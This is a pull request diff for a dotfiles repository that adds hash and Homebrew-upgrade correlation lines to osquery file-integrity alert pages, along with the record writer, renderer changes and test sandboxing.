### PR TITLE
feat(osquery): make a file-integrity page triageable

### DIFF
--- a/dot_local/bin/executable_homebrew-weekly-upgrade.sh
+++ b/dot_local/bin/executable_homebrew-weekly-upgrade.sh
@@ -34,6 +34,14 @@ LOCKFILE="${HOMEBREW_WEEKLY_LOCKFILE:-$HOME/.local/state/homebrew-weekly-upgrade
 STATE_DIR="${HOMEBREW_WEEKLY_STATE_DIR:-$HOME/.local/state/homebrew-weekly-upgrade}"
 LOG_SUCCESS_MARKER="$STATE_DIR/last-success-at"
 LOG_WEEK_GUARD="$STATE_DIR/log-week-claims"
+# The durable record of what THIS run moved, for the osquery file-integrity page
+# to correlate against days later. Keep this literal in sync with
+# OSQUERY_UPGRADE_RECORD in
+# ~/.local/libexec/osquery/results-alerter/file-integrity-triage.sh (the
+# consumer); test/unit/osquery-file-integrity-triage.sh pins them equal, because
+# a rename in one alone leaves that page answering no-record forever, which reads
+# exactly like a quiet month of upgrades.
+UPGRADE_RECORD="$STATE_DIR/last-upgrade-changes.tsv"
 
 # An unknown argument is an ERROR, never a silent fallthrough: a typo'd marker in
 # the plist would otherwise run every week and quietly post nothing, which looks
@@ -155,6 +163,60 @@ __homebrew_package_snapshot() {
       return 1
       ;;
   esac
+}
+
+# write_upgrade_record -- persist what this run moved, so something days later
+# can ask whether an upgrade plausibly explains a file that changed.
+#
+# WHO READS IT. The osquery file-integrity page fires when a watched file leaves
+# its known-good manifest, and a vendor update and a tamper used to render the
+# same body. The page now carries a correlation line built from this file. The
+# record is a LEAD there and is labelled as one: it lives in this
+# operator-writable state dir, so it is not a trust input, and nothing about it
+# can suppress or downgrade a page.
+#
+# NOT GATED ON --scheduled, unlike the Discord entry. That gate exists because
+# the entry is a LIVENESS signal, and an ad-hoc run posting one would make a dead
+# LaunchAgent look alive. This record answers a different question, and an
+# operator running `just brew-upgrade` on a Wednesday moves exactly as many
+# package files as Monday noon does.
+#
+# BREW ONLY. App Store apps install into /Applications, which no known-good
+# manifest covers and no file-integrity watch reads, so a mas transition could
+# never explain one of these pages and listing it would only pad the line.
+#
+# ONE CLOCK READING for both timestamp fields (the house idiom from
+# unattended_log_entry_header): the epoch is what the reader does arithmetic on
+# and the ISO string is what it renders, and two `date` calls could disagree.
+#
+# Written to a temp file and moved into place, so a reader mid-write sees the
+# previous record whole rather than a torn one. Best effort throughout: upgrading
+# matters more than bookkeeping, and every failure is stated rather than silent.
+write_upgrade_record() {
+  local epoch="" iso=""
+  [[ -n $brew_snapshot_ok ]] || {
+    printf 'homebrew-weekly-upgrade: the package listing could not be read, so the upgrade record was left at its previous contents; a stale record simply falls out of the correlation window\n' >&2
+    return 0
+  }
+  read -r epoch iso < <(date -u '+%s %Y-%m-%dT%H:%M:%SZ' 2>/dev/null) || true
+  if [[ ! $epoch =~ ^[0-9]+$ || -z $iso ]]; then
+    printf 'homebrew-weekly-upgrade: WARNING this clock could not be read, so no upgrade record was written for this run\n' >&2
+    return 0
+  fi
+  mkdir -p "$STATE_DIR" 2>/dev/null || true
+  if ! {
+    printf '%s\t%s\n' "$epoch" "$iso"
+    unattended_log_change_tuples "$snapshot_dir/brew.before" "$snapshot_dir/brew.after"
+  } >"$UPGRADE_RECORD.tmp" 2>/dev/null; then
+    printf 'homebrew-weekly-upgrade: WARNING could not write the upgrade record at %s; the file-integrity page will report no recorded upgrade\n' \
+      "$UPGRADE_RECORD" >&2
+    rm -f "$UPGRADE_RECORD.tmp" 2>/dev/null || true
+    return 0
+  fi
+  mv -f "$UPGRADE_RECORD.tmp" "$UPGRADE_RECORD" 2>/dev/null ||
+    printf 'homebrew-weekly-upgrade: WARNING could not install the upgrade record at %s; the file-integrity page will report no recorded upgrade\n' \
+      "$UPGRADE_RECORD" >&2
+  return 0
 }
 
 # Serialize: one weekly upgrade at a time, via the KERNEL. The Monday-noon
@@ -303,6 +365,7 @@ if [[ -n $UNATTENDED_LOG_AVAILABLE ]]; then
   if [[ -n $snapshot_dir ]]; then
     __homebrew_package_snapshot brew >"$snapshot_dir/brew.after" || brew_snapshot_ok=""
     __homebrew_package_snapshot mas >"$snapshot_dir/mas.after" || mas_snapshot_ok=""
+    write_upgrade_record
   fi
   weekly_record completed "$(printf '%s\n%s\nfailed steps: %d' \
     "$(unattended_log_change_section "$brew_snapshot_ok" \

--- a/dot_local/bin/unattended-log-lib.sh
+++ b/dot_local/bin/unattended-log-lib.sh
@@ -300,6 +300,48 @@ __unattended_log_code() {
   printf '`%s`' "$text"
 }
 
+# unattended_log_change_tuples <before-file> <after-file>
+#
+# The raw diff between two snapshots, one line per name that MOVED, tab
+# separated:
+#
+#   <name>	<added|removed|changed>	<before-fingerprint>	<after-fingerprint>
+#
+# The absent side of an add or a remove is the empty string. A pair with nothing
+# between them prints nothing at all.
+#
+# WHY THIS IS SEPARATE FROM THE SENTENCE ABOVE IT. The Discord entry is one
+# consumer; the other is the osquery file-integrity page, which asks whether a
+# recorded upgrade plausibly explains a file whose content hash left its
+# known-good manifest. That question needs the transition as DATA, and it is
+# asked days after the run that answered it, so the weekly Homebrew job persists
+# these lines to disk. Both readings come from this one walk, so the channel and
+# the page can never disagree about what a week did.
+#
+# A TAB inside a fingerprint is DELETED before it is emitted. The tuple is tab
+# separated and is read back field by field, so a fingerprint carrying one would
+# shift the state into a version column. Deleted rather than replaced, because
+# the code-span quoting already deletes every control character, so the rendered
+# summary is unchanged by this.
+unattended_log_change_tuples() {
+  local before="$1" after="$2" name fingerprint_after fingerprint_before
+  while IFS=$'\t' read -r name fingerprint_after; do
+    [[ -n $name ]] || continue
+    if ! fingerprint_before="$(__unattended_log_lookup "$before" "$name")"; then
+      printf '%s\t%s\t%s\t%s\n' "$name" added "" "${fingerprint_after//$'\t'/}"
+    elif [[ $fingerprint_before != "$fingerprint_after" ]]; then
+      printf '%s\t%s\t%s\t%s\n' "$name" changed \
+        "${fingerprint_before//$'\t'/}" "${fingerprint_after//$'\t'/}"
+    fi
+  done <"$after"
+  while IFS=$'\t' read -r name fingerprint_before; do
+    [[ -n $name ]] || continue
+    if ! __unattended_log_lookup "$after" "$name" >/dev/null; then
+      printf '%s\t%s\t%s\t%s\n' "$name" removed "${fingerprint_before//$'\t'/}" ""
+    fi
+  done <"$before"
+}
+
 # unattended_log_change_line <before-file> <after-file> <label> <caveat> <style>
 #
 # One sentence describing what moved between two snapshots. Both files hold
@@ -328,28 +370,33 @@ __unattended_log_code() {
 # See that function for what it prevents.
 unattended_log_change_line() {
   local before="$1" after="$2" label="$3" caveat="$4" style="$5"
-  local total=0 name fingerprint_after fingerprint_before shown
+  local total=0 name state fingerprint_before fingerprint_after shown
   local -a changed=()
-  while IFS=$'\t' read -r name fingerprint_after; do
+  # The TOTAL is the tracked population, which the tuples deliberately do not
+  # describe: they list only what MOVED. It is the after-rows plus the removals,
+  # because counting the after-rows alone renders the impossible "2 of 0 tracked
+  # entries changed" on an emptied snapshot.
+  while IFS=$'\t' read -r name _; do
     [[ -n $name ]] || continue
     total=$((total + 1))
-    if ! fingerprint_before="$(__unattended_log_lookup "$before" "$name")"; then
-      changed+=("$(__unattended_log_code "$name") (added)")
-    elif [[ $fingerprint_before != "$fingerprint_after" ]]; then
-      if [[ $style == "versions" ]]; then
-        changed+=("$(__unattended_log_code "$name") $(__unattended_log_code "$fingerprint_before") -> $(__unattended_log_code "$fingerprint_after")")
-      else
-        changed+=("$(__unattended_log_code "$name")")
-      fi
-    fi
   done <"$after"
-  while IFS=$'\t' read -r name fingerprint_before; do
+  while IFS=$'\t' read -r name state fingerprint_before fingerprint_after; do
     [[ -n $name ]] || continue
-    if ! __unattended_log_lookup "$after" "$name" >/dev/null; then
-      changed+=("$(__unattended_log_code "$name") (removed)")
-      total=$((total + 1))
-    fi
-  done <"$before"
+    case "$state" in
+      added) changed+=("$(__unattended_log_code "$name") (added)") ;;
+      removed)
+        changed+=("$(__unattended_log_code "$name") (removed)")
+        total=$((total + 1))
+        ;;
+      *)
+        if [[ $style == "versions" ]]; then
+          changed+=("$(__unattended_log_code "$name") $(__unattended_log_code "$fingerprint_before") -> $(__unattended_log_code "$fingerprint_after")")
+        else
+          changed+=("$(__unattended_log_code "$name")")
+        fi
+        ;;
+    esac
+  done < <(unattended_log_change_tuples "$before" "$after")
 
   if [[ ${#changed[@]} -eq 0 ]]; then
     printf '%s: 0 of %d tracked entries changed. %s' "$label" "$total" "$caveat"

--- a/dot_local/libexec/osquery/executable_results-alerter.sh
+++ b/dot_local/libexec/osquery/executable_results-alerter.sh
@@ -25,7 +25,7 @@ set -euo pipefail
 LOG="${OSQUERY_RESULTS_LOG:-$HOME/.local/log/osquery/osqueryd.results.log}"
 STATE="${OSQUERY_RESULTS_OFFSET:-$HOME/.local/state/osquery-results-offset}"
 
-# The dispatch library and the six pipeline helpers, from the libexec home (the
+# The dispatch library and the seven pipeline helpers, from the libexec home (the
 # same deployed path the other consumers source; literal so the relocation guard
 # can assert it).
 # shellcheck source=/dev/null
@@ -38,6 +38,8 @@ source "$HOME/.local/libexec/osquery/results-alerter/route.sh"
 source "$HOME/.local/libexec/osquery/results-alerter/allowlist-verdict.sh"
 # shellcheck source=/dev/null
 source "$HOME/.local/libexec/osquery/results-alerter/pipeline-verdict.sh"
+# shellcheck source=/dev/null
+source "$HOME/.local/libexec/osquery/results-alerter/file-integrity-triage.sh"
 # shellcheck source=/dev/null
 source "$HOME/.local/libexec/osquery/results-alerter/digest-store.sh"
 # shellcheck source=/dev/null

--- a/dot_local/libexec/osquery/results-alerter/file-integrity-triage.sh
+++ b/dot_local/libexec/osquery/results-alerter/file-integrity-triage.sh
@@ -1,0 +1,305 @@
+#!/usr/bin/env bash
+#
+# file-integrity-triage.sh - a sourced helper for results-alerter.sh. Functions
+# only, no main. DISPLAY-ONLY: nothing here changes a severity, suppresses a
+# finding, or returns non-zero.
+#
+# WHY IT EXISTS. The file-integrity page fires whenever a watched file diverges
+# from its root-owned known-good manifest, and every one of those pages read the
+# same: a path, a verb, and a next step. A routine vendor update and a tamper
+# were byte-identical bodies, so triage started from zero every time - open a
+# terminal, hash the file by hand, read the manifest by hand, then try to
+# remember whether anything upgraded itself lately. This puts the three facts
+# that separate those two cases INTO the page:
+#
+#   recorded  the sha256 the governing manifest binds to this exact path, short
+#   ondisk    the sha256 the file carries right now, short
+#   upgrade   whether a RECORDED unattended upgrade plausibly explains it
+#
+# Equal hashes are informative on their own: the verdict paged, so something
+# diverged, and if the content agrees then the divergence is the mode, the owner,
+# or the manifest being unusable at all.
+#
+# WHAT IT NEVER DOES. It never says a change is safe and it never dismisses one.
+# A correlated upgrade is a LEAD, and the rendered line says so in as many words,
+# because the record it reads is not a trust input: it lives in the
+# operator-writable state dir, so whoever tampered with a manifested file could
+# also write a record claiming an upgrade explains it. The page still pages, at
+# the same tier, with the same next step.
+#
+# A PAGE IS NEVER LOST TO A CORRELATION FAILURE. Every function here returns 0,
+# on every input. The caller runs under `set -euo pipefail` and has ALREADY
+# decided to page by the time it asks, so a missing record, a malformed record,
+# an unreadable manifest or a vanished file each cost the page one LINE and
+# nothing more. Each of those states renders its own sentence rather than an
+# empty field, and the ones that mean something is broken also say so on stderr,
+# which lands in the alerter's launchd log.
+#
+# THE MAPPING FROM A FILE TO THE PACKAGE THAT SHIPS IT IS NOT KNOWABLE HERE, and
+# this is the limit to keep in mind when reading a page. The upgrade record lists
+# package NAMES and version transitions, not file lists; asking Homebrew which
+# formula owns a path would mean forking brew from the alert path, and a keg that
+# has since been cleaned up cannot answer for the version it replaced anyway. So
+# the only correlation this makes is a NAME match against the flagged file's
+# basename, which is a lead and is labelled as one. When nothing matches, the
+# line states what the recent run DID change instead of claiming a mapping it
+# cannot verify.
+#
+# WHICH PAGES AN UPGRADE CAN EVEN EXPLAIN, stated so the correlation is not read
+# as broader than it is. Both known-good manifests are derived from chezmoi
+# INTENT, so on a healthy machine no Homebrew upgrade can move a manifested file
+# and the honest answer is almost always the no-match line. The case where the
+# correlation earns its place is the managed-bin FAIL-SAFE: when that manifest is
+# missing, empty or untrustworthy, _managed_bin_is_tracked deliberately tracks
+# EVERYTHING under ~/.local/bin, which is where the self-updating third-party
+# shims live (herdr, mise, bob, hermes, yt-dlp, and the pipx and uv symlinks).
+# Every one of their updates then pages, and several of them are Homebrew
+# formulae. The hash pair below is what carries the other pages: it says whether
+# the content diverged at all, or whether the mode, the owner or the manifest
+# itself is what the verdict actually tripped on.
+#
+# NO APOSTROPHES IN ANY STRING HERE. Every value reaches the page through
+# render-page.sh, whose jq program is bash SINGLE-QUOTED; an apostrophe in a
+# rendered string ends that quoting and breaks the renderer.
+
+# The upgrade record, written by ~/.local/bin/homebrew-weekly-upgrade.sh at the
+# end of every run whose package listing could be read. Keep this literal in sync
+# with the producer; test/unit/osquery-file-integrity-triage.sh pins them equal,
+# because a rename in one alone leaves this answering no-record forever, which
+# reads exactly like a quiet month of upgrades.
+#
+# Format, tab separated. Line 1 is the run that produced it:
+#
+#   <epoch-seconds>	<iso-8601-utc>
+#
+# and every later line is one package that moved:
+#
+#   <name>	<added|removed|changed>	<before-version>	<after-version>
+#
+# The absent side of an add or a remove is the empty string. A run that changed
+# nothing writes line 1 alone, which is a fact worth having: it dates the last
+# time anything upgraded at all.
+OSQUERY_UPGRADE_RECORD="${OSQUERY_UPGRADE_RECORD:-$HOME/.local/state/homebrew-weekly-upgrade/last-upgrade-changes.tsv}"
+
+# How recent a recorded upgrade must be to be offered as an explanation.
+#
+# THREE DAYS, and the number is chosen against the two clocks that bound it. The
+# upgrade job runs weekly, so a window of seven days or more could hold two runs
+# and the answer would stop being unambiguous; the record keeps only the newest
+# run for the same reason. At the other end, the page itself is fast (an event is
+# judged within seconds, and the scheduled audit within two 15-minute ticks), so
+# the honest causal gap between an upgrade and its page is minutes. Three days is
+# the slack between those: it survives a machine that slept through Monday and a
+# launchd interval coalesced into a later wake, without ever letting a
+# fortnight-old upgrade be waved at a page it cannot explain.
+OSQUERY_UPGRADE_RECORD_WINDOW_DAYS=3
+
+# A record longer than this is refused whole rather than walked. The real file
+# lists the packages one weekly run moved (tens, at a whole-Cellar move maybe a
+# few hundred), and this runs on the alert path, where an unbounded read of a
+# file anyone can append to would be a way to stall paging.
+OSQUERY_UPGRADE_RECORD_MAX_ROWS=500
+
+# How many package names an unmatched line lists before it counts the rest. The
+# whole sentence is capped at 240 characters by the renderer, so a long list
+# would be truncated mid-name and take the timestamp with it.
+OSQUERY_UPGRADE_RECORD_NAME_CAP=5
+
+# _file_integrity_short <sha256>: the first twelve hex characters of a plausible
+# sha256, or the empty string. Long enough to read back off a terminal against
+# `shasum -a 256`, short enough to sit in a page line beside its twin. Validated
+# rather than sliced blind, so a stat error string or a truncated manifest column
+# renders as nothing rather than as a plausible-looking digest.
+_file_integrity_short() {
+  local hash="${1,,}"
+  [[ $hash =~ ^[0-9a-f]{64}$ ]] || return 0
+  printf '%s' "${hash:0:12}"
+  return 0
+}
+
+# _file_integrity_recorded_hash <target>: the short sha256 the governing manifest
+# binds to this exact path, or a stated reason there is none. Never a guess.
+#
+# The manifest CHOICE is reused from pipeline-verdict.sh rather than re-derived:
+# which of the two known-good lists governs a path is a security decision that
+# already has one owner and one test. Checked by NAME, because this helper is
+# sourced beside that one and a partial deploy must report a broken lookup rather
+# than resolve every path to the wrong list.
+_file_integrity_recorded_hash() {
+  local target="$1" manifest hash path
+  if ! declare -F _pipeline_manifest_for >/dev/null 2>&1; then
+    printf 'manifest lookup unavailable'
+    return 0
+  fi
+  manifest="$(_pipeline_manifest_for "$target")"
+  if [[ ! -r $manifest || ! -s $manifest ]]; then
+    printf 'manifest unreadable'
+    return 0
+  fi
+  # Four whitespace-separated columns with the PATH LAST, so a path holding
+  # spaces is taken whole by the final field; the same idiom the verdict and the
+  # audit read this file with. `|| [[ -n $hash ]]` keeps a final line with no
+  # trailing newline in scope.
+  while read -r hash _ _ path || [[ -n $hash ]]; do
+    [[ -n $path && $path == "$target" ]] || continue
+    hash="$(_file_integrity_short "$hash")"
+    if [[ -n $hash ]]; then
+      printf '%s' "$hash"
+      return 0
+    fi
+  done <"$manifest"
+  # No tuple for this path is not a defect to hide: it is the fail-safe shape the
+  # verdict pages on (a file the manifest can never vouch for), and naming it is
+  # what tells the operator the manifest is not merely disagreeing.
+  printf 'not in the manifest'
+  return 0
+}
+
+# _file_integrity_disk_hash <target>: the short sha256 the file carries right
+# now, or a stated reason there is none. Links are named, never followed: a
+# symlink standing where a manifested file belongs is itself the finding, and
+# hashing through it would report the referent bytes as if they were the watched
+# ones.
+_file_integrity_disk_hash() {
+  local target="$1" hash
+  if [[ -L $target ]]; then
+    printf 'a symbolic link'
+    return 0
+  fi
+  if [[ ! -e $target ]]; then
+    printf 'absent'
+    return 0
+  fi
+  if [[ ! -f $target ]]; then
+    printf 'not a regular file'
+    return 0
+  fi
+  hash="$(shasum -a 256 -- "$target" 2>/dev/null)"
+  hash="$(_file_integrity_short "${hash%% *}")"
+  if [[ -n $hash ]]; then
+    printf '%s' "$hash"
+    return 0
+  fi
+  printf 'unreadable'
+  return 0
+}
+
+# _file_integrity_upgrade_line <target>: one sentence saying whether a recorded
+# unattended upgrade plausibly explains this file changing.
+#
+# Five endings, each a fact rather than a verdict:
+#   a name match inside the window  -> the transition, its timestamp, and the
+#                                      explicit statement that a name match is
+#                                      not proof
+#   no name match inside the window -> what the run DID change, or that it
+#                                      changed nothing
+#   the newest record is older      -> which window it fell out of, and when it
+#                                      is from
+#   no record on this machine       -> said plainly
+#   the record cannot be parsed     -> said plainly, and warned about on stderr
+#
+# A record whose timestamp is in the FUTURE (a restored backup, a clock
+# correction) falls out of the window arm and is shown with its timestamp, which
+# is the honest reading: it is not in the last three days, and the operator can
+# see why at a glance.
+_file_integrity_upgrade_line() {
+  local target="$1" record="$OSQUERY_UPGRADE_RECORD"
+  local basename_of_target="${target##*/}"
+  local epoch iso now age window rows=0
+  local name state version_before version_after
+  local matched="" matched_before="" matched_after=""
+  local -a changed_names=()
+
+  if [[ ! -r $record ]]; then
+    printf 'no upgrade record on this machine'
+    return 0
+  fi
+  # The first line dates the record. Read on its own open rather than inside the
+  # row loop, so the row loop needs no line counter and the two shapes never mix.
+  read -r epoch iso <"$record" 2>/dev/null || true
+  if [[ ! $epoch =~ ^[0-9]{1,11}$ ]] ||
+    [[ ! $iso =~ ^[0-9]{4}-[0-9]{2}-[0-9]{2}T[0-9]{2}:[0-9]{2}:[0-9]{2}Z$ ]]; then
+    printf 'osquery file-integrity triage: the upgrade record at %s does not start with a run timestamp; this page carries no correlation\n' \
+      "$record" >&2
+    printf 'the upgrade record could not be read'
+    return 0
+  fi
+
+  now="${EPOCHSECONDS:-$(date +%s)}"
+  [[ $now =~ ^[0-9]{1,11}$ ]] || now=0
+  window=$((OSQUERY_UPGRADE_RECORD_WINDOW_DAYS * 86400))
+  age=$((10#$now - 10#$epoch))
+  if ((age < 0)) || ((age > window)); then
+    printf 'no recorded upgrade in the last %s days; the newest record is from %s' \
+      "$OSQUERY_UPGRADE_RECORD_WINDOW_DAYS" "$iso"
+    return 0
+  fi
+
+  while IFS=$'\t' read -r name state version_before version_after || [[ -n $name ]]; do
+    rows=$((rows + 1))
+    ((rows == 1)) && continue # the run timestamp, already read above
+    [[ -n $name ]] || continue
+    if ((rows > OSQUERY_UPGRADE_RECORD_MAX_ROWS)); then
+      printf 'osquery file-integrity triage: the upgrade record at %s lists more than %s rows; this page carries no correlation\n' \
+        "$record" "$OSQUERY_UPGRADE_RECORD_MAX_ROWS" >&2
+      printf 'the upgrade record could not be read'
+      return 0
+    fi
+    case "$state" in
+      added | removed | changed) ;;
+      *)
+        # A row this cannot describe makes the WHOLE record untrustworthy rather
+        # than one row skippable: a partial reading rendered as a complete one is
+        # the failure this correlation exists to avoid.
+        printf 'osquery file-integrity triage: the upgrade record at %s holds a row with no recognised state; this page carries no correlation\n' \
+          "$record" >&2
+        printf 'the upgrade record could not be read'
+        return 0
+        ;;
+    esac
+    changed_names+=("$name")
+    if [[ -z $matched && $name == "$basename_of_target" ]]; then
+      matched="$name"
+      matched_before="${version_before:-none}"
+      matched_after="${version_after:-none}"
+    fi
+  done <"$record"
+
+  if [[ -n $matched ]]; then
+    printf 'recorded upgrade: %s %s -> %s at %s (the name matches this file, which is not proof)' \
+      "$matched" "$matched_before" "$matched_after" "$iso"
+    return 0
+  fi
+  if [[ ${#changed_names[@]} -eq 0 ]]; then
+    printf 'no recorded upgrade names this file; the run at %s changed nothing' "$iso"
+    return 0
+  fi
+  # Names only, no versions: the whole sentence shares a 240-character cap with
+  # the timestamp, and a truncated list that swallowed the date would be worse
+  # than a shorter one.
+  local shown
+  shown="$(printf '%s, ' "${changed_names[@]:0:OSQUERY_UPGRADE_RECORD_NAME_CAP}")"
+  shown="${shown%, }"
+  if [[ ${#changed_names[@]} -gt $OSQUERY_UPGRADE_RECORD_NAME_CAP ]]; then
+    shown="$shown, and $((${#changed_names[@]} - OSQUERY_UPGRADE_RECORD_NAME_CAP)) more"
+  fi
+  printf 'no recorded upgrade names this file; the run at %s changed: %s' "$iso" "$shown"
+  return 0
+}
+
+# file_integrity_triage <target>: the three facts as one compact JSON object, for
+# the router to attach to a finding and the renderer to print.
+#
+# Built with `jq -n --arg`, never by interpolating into a JSON string: two of the
+# three values carry text chosen by whoever published a package. A jq that cannot
+# run at all yields an empty object, so the renderer falls back to its own
+# placeholders and the page survives that too.
+file_integrity_triage() {
+  local target="$1"
+  jq -cn \
+    --arg recorded "$(_file_integrity_recorded_hash "$target")" \
+    --arg ondisk "$(_file_integrity_disk_hash "$target")" \
+    --arg upgrade "$(_file_integrity_upgrade_line "$target")" \
+    '{recorded: $recorded, ondisk: $ondisk, upgrade: $upgrade}' 2>/dev/null || printf '{}'
+  return 0
+}

--- a/dot_local/libexec/osquery/results-alerter/render-page.sh
+++ b/dot_local/libexec/osquery/results-alerter/render-page.sh
@@ -9,6 +9,13 @@
 # Layout follows the ADHD surfacing research: one thing, glanceable, minimal
 # fields, ending in a single action, no raw query jargon.
 #
+# File-integrity triage: a file_events finding the router gathered triage facts
+# for (a watched file that left its known-good manifest) renders two extra lines
+# - the recorded and on-disk content hashes in short form, and whether a recorded
+# unattended upgrade plausibly explains the change. See
+# file-integrity-triage.sh for what that correlation is and is not: it is a lead,
+# never a verdict, and no page is ever suppressed or downgraded by it.
+#
 # Criterion 7 (basename-only): a secret/auth-file finding
 # (agent_authfile_changed, agent_secretfile_changed) renders the file's BASENAME
 # only - never its full path, and never a sha256/digest. Those detectors reach
@@ -101,7 +108,17 @@ render_page() {
       elif .q == "remote_access_sharing_state" then ["- **Service:** \(($c.service // "?") | code)"]
       elif .q == "system_extensions_new" then ["- **Name:** \(($c.identifier // "?") | code)", "- **Team:** \(($c.team // "?") | code)"] + $sg
       elif .q == "kernel_extensions_new" then ["- **Name:** \(($c.name // "?") | code)", "- **Path:** \(($c.path // "?") | code)"] + $sg
+      # A file-integrity finding the router could gather triage facts for carries
+      # them here: WHICH bytes disagree, and whether a recorded upgrade plausibly
+      # explains it. Both go through `code`, which is the single sanitize
+      # chokepoint - the upgrade sentence quotes package names and versions
+      # chosen by whoever published them. Absent .triage renders nothing extra,
+      # which is what the ssh and sshd_config file events take.
       elif .q == "file_events_recent" then ["- **File:** \(($c.target_path // "?") | code)", "- **Action:** \(($c.action // .act) | gsub("[\r\n\t]"; " "))"]
+        + (if (.triage | type) == "object" then
+             ["- **Recorded:** \((.triage.recorded // "?") | code) · **On disk:** \((.triage.ondisk // "?") | code)",
+              "- **Upgrade record:** \((.triage.upgrade // "?") | code)"]
+           else [] end)
       elif .q == "es_launchd_writes" then ["- **Process:** \(($c.path // "?") | code)", "- **Wrote:** \(($c.filename // $c.dest_filename // "?") | code)"] + $sg
       elif (protname) != null then ["- **State:** **OFF**"]
       else $sg + ["- **What:** \((keyid) | code)"] end;

--- a/dot_local/libexec/osquery/results-alerter/route.sh
+++ b/dot_local/libexec/osquery/results-alerter/route.sh
@@ -116,6 +116,7 @@ route_findings() {
 
   local -a pages=()
   local i q act path label program category target base hash verb ep sev av signing enrich_status
+  local triage enriched
   for i in "${!objs[@]}"; do
     obj=${objs[i]}
     q=$(jq -r '.q' <<<"$obj")
@@ -299,6 +300,26 @@ route_findings() {
             hash=$(jq -r '.cols.sha256 // ""' <<<"$obj")
             verb=$(jq -r '.cols.action // ""' <<<"$obj")
             if pipeline_verdict "$target" "$hash" "$verb"; then sev="CRIT"; else continue; fi
+            # TRIAGE FACTS, attached only once the verdict has already decided to
+            # page. Every page from this arm used to render as a path and a verb,
+            # which reads identically for a vendor update and a tamper; these are
+            # the recorded hash, the on-disk hash and whether a recorded upgrade
+            # plausibly explains the change. DISPLAY ONLY - nothing here can
+            # change the tier that was just decided, and file-integrity-triage.sh
+            # holds the standing rule that a correlation never says safe.
+            #
+            # GUARDED AT EVERY STEP so a page cannot be lost to a fact that is
+            # merely nice to have: an absent helper, a helper that fails, and
+            # output that is not JSON each leave the finding exactly as the
+            # verdict produced it. Both conditions are `if` tests, which is what
+            # keeps `set -e` from ending the pass on any of them.
+            if declare -F file_integrity_triage >/dev/null 2>&1; then
+              triage=$(file_integrity_triage "$target" 2>/dev/null) || triage=""
+              if [[ -n $triage ]] &&
+                enriched=$(jq -c --argjson t "$triage" '.triage = $t' <<<"$obj" 2>/dev/null); then
+                obj="$enriched"
+              fi
+            fi
             ;;
           sudoers)
             digest_append "$obj"

--- a/test/e2e/homebrew-weekly-lock.sh
+++ b/test/e2e/homebrew-weekly-lock.sh
@@ -29,6 +29,13 @@ fi
 tmp="$(mktemp -d)"
 trap 'rm -rf "$tmp"' EXIT
 
+# The helper keeps its bookkeeping (the last-success marker, the week guard, and
+# the upgrade record the osquery file-integrity page reads) under this directory,
+# which defaults to the invoking user's real ~/.local/state. Point it at the
+# sandbox: a test run must not write into the record a security page correlates
+# against.
+export HOMEBREW_WEEKLY_STATE_DIR="$tmp/state"
+
 lockfile="$tmp/weekly.lock"
 parked="$tmp/parked"
 go="$tmp/go"

--- a/test/e2e/homebrew-weekly-record.sh
+++ b/test/e2e/homebrew-weekly-record.sh
@@ -23,6 +23,10 @@ set -uo pipefail
 
 REPO_ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")/../.." && pwd)"
 HELPER="$REPO_ROOT/dot_local/bin/executable_homebrew-weekly-upgrade.sh"
+# The osquery file-integrity triage helper, sourced ONLY to read back the record
+# path it expects. It is the consumer of what this job persists, and the two must
+# not agree merely by copy-paste.
+TRIAGE_HELPER="$REPO_ROOT/dot_local/libexec/osquery/results-alerter/file-integrity-triage.sh"
 
 fail() {
   printf 'homebrew-weekly-record: FAIL -- %s\n' "$*" >&2
@@ -244,6 +248,33 @@ refute 'yq 4' "$entries" "an unchanged formula was listed as changed"
 # shellcheck disable=SC2016 # the backticks are Discord code-span syntax, not a substitution
 grep -qF 'App Store apps: 1 of 1 tracked entries changed (`Xcode` `16.2` -> `16.3`)' <<<"$entries" ||
   fail "an upgraded App Store app's version transition was not reported: $entries"
+
+# ── 4b. The same run leaves a DURABLE record of what it moved, at the exact path
+#       the osquery file-integrity page reads days later. That page fires when a
+#       watched file leaves its known-good manifest, and a vendor update and a
+#       tamper used to render the same body; the record is what lets it say
+#       whether a recorded upgrade plausibly explains the file. The path is
+#       asserted by SOURCING the consumer rather than by repeating a literal
+#       here: a rename in one of the two scripts alone leaves that page answering
+#       no-record forever, which reads exactly like a quiet month of upgrades. ──
+record_path="$(bash -c 'source "$1"; printf "%s" "$OSQUERY_UPGRADE_RECORD"' _ "$TRIAGE_HELPER")"
+[[ -n $record_path ]] || fail "the triage helper does not name an upgrade record path"
+[[ -f $record_path ]] ||
+  fail "the run left no upgrade record at the path the file-integrity page reads ($record_path): $RUN_OUTPUT"
+read -r record_epoch record_iso <"$record_path"
+[[ $record_epoch =~ ^[0-9]+$ ]] ||
+  fail "the record does not open with an epoch the correlation can do arithmetic on: $(cat "$record_path")"
+[[ $record_iso =~ ^[0-9]{4}-[0-9]{2}-[0-9]{2}T[0-9]{2}:[0-9]{2}:[0-9]{2}Z$ ]] ||
+  fail "the record does not open with an ISO 8601 UTC stamp the page can render: $(cat "$record_path")"
+grep -qF "$(printf 'jq\tchanged\t1.7.1\t1.8.0')" "$record_path" ||
+  fail "the record does not carry the version transition as data: $(cat "$record_path")"
+grep -qF "$(printf 'ripgrep\tadded\t\t14.1.1')" "$record_path" ||
+  fail "the record does not mark a newly installed formula as added: $(cat "$record_path")"
+refute '^yq' "$(cat "$record_path")" "the record lists a formula that did not move"
+# The App Store lane is deliberately absent: those apps install into
+# /Applications, which no known-good manifest covers, so a mas transition could
+# never explain one of these pages and would only crowd out the line.
+refute 'Xcode' "$(cat "$record_path")" "the record carries App Store apps, which no file-integrity page can be about"
 unset MAS_AFTER
 
 # ── 5. FAILURES go to the EXISTING alert route, and the record still goes out

--- a/test/integration/homebrew-weekly-upgrade.sh
+++ b/test/integration/homebrew-weekly-upgrade.sh
@@ -26,6 +26,13 @@ fail() {
 tmp="$(mktemp -d)"
 trap 'rm -rf "$tmp"' EXIT
 
+# The helper keeps its bookkeeping (the last-success marker, the week guard, and
+# the upgrade record the osquery file-integrity page reads) under this directory,
+# which defaults to the invoking user's real ~/.local/state. Point it at the
+# sandbox: a test run must not write a mock formula list into the record a
+# security page correlates against.
+export HOMEBREW_WEEKLY_STATE_DIR="$tmp/state"
+
 # All seven section headers plus the done marker; every scenario must print them
 # (resilience: no failure short-circuits a later step).
 sections=(

--- a/test/unit/osquery-file-integrity-triage.sh
+++ b/test/unit/osquery-file-integrity-triage.sh
@@ -1,0 +1,205 @@
+#!/usr/bin/env bash
+#
